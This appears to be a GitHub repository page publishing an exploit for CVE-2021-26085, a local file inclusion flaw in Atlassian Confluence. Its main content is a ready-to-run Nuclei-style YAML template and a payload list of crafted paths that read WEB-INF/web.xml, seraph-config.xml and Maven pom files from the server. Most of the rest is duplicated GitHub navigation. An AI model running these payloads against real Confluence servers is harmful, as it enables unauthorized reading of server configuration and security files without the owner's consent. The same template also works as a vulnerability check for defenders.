GitHub - zeroc00I/CVE-2021-26085

CVE-2021-26085

Ideas from: https://github.com/ColdFusionX/CVE-2021-26085

Modifications from: my burp

DISCLAIMER: List domains should end by "/"

confluence-CVE-2021-26085.yaml

id: confluence-lfi-fuzz

info:
  name: confluence-lfi-zeroc00I
  author: zeroc00I
  severity: high
  reference: lfi
  tags: lfi

attack: clusterbomb

requests:
  - payloads:
      path: confluence-lfi.txt
    raw:
      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "groupId>org.springframework"
        part: body
      - type: word
        words:
          - "Generated by Maven"
        part: body
      - type: word
        words:
          - "security-config"
        part: body
      - type: word
        words:
          - 'com.atlassian.confluence.setup'

confluence-lfi.txt

s/123cfx/_/;/WEB-INF/web.xml
s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
confluencetests.png		confluencetests.png
readme.md		readme.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

confluencetests.png

confluencetests.png

readme.md

readme.md

Repository files navigation

CVE-2021-26085

DISCLAIMER: List domains should end by "/"

confluence-CVE-2021-26085.yaml

confluence-lfi.txt

Running Demo

About

Releases

Packages

zeroc00I/CVE-2021-26085

Folders and files

Latest commit

History

confluencetests.png

confluencetests.png

readme.md

readme.md

Repository files navigation

CVE-2021-26085

DISCLAIMER: List domains should end by "/"

confluence-CVE-2021-26085.yaml

confluence-lfi.txt

Running Demo

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages